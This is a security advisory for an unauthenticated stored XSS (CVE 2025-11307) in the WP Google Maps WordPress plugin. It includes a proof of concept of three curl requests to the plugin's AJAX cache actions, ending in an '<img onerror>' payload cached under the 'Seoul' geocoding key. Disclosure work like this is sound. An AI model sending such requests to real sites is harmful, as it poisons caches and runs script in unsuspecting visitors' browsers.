WP Google Maps < 9.0.48 – Unauthenticated Stored XSS | CVE 2025-11307

Description

The plugin does not sanitize user input provided via an AJAX action, allowing unauthenticated users to store XSS payloads which are later retrieved from another AJAX call and output unescaped.

Proof of Concept

Step 1: Write malicious data to cache (unauthenticated request)

curl -sS -X POST 'http://localhost:8085/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=wpgmza_store_nominatim_cache' \
  --data-urlencode 'query=test-key-123' \
  --data-urlencode 'response={"injected":"YES","note":"unauth write"}'

Result: {"success":1}

Step 2: Read poisoned cache entry (unauthenticated request)

curl -sS -G 'http://localhost:8085/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=wpgmza_query_nominatim_cache' \
  --data-urlencode 'query=test-key-123'

Result: {"injected":"YES","note":"unauth write"}

Step 3: XSS payload injection

curl -sS -X POST 'http://localhost:8085/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=wpgmza_store_nominatim_cache' \
  --data-urlencode 'query=Seoul' \
  --data-urlencode 'response=[{"display_name":"<img src=x onerror=alert(1)>","lat":"0","lon":"0","boundingbox":[0,0,0,0]}]'

When legitimate users perform geocoding for "Seoul", the poisoned cache entry is returned and the XSS payload executes in their browser context.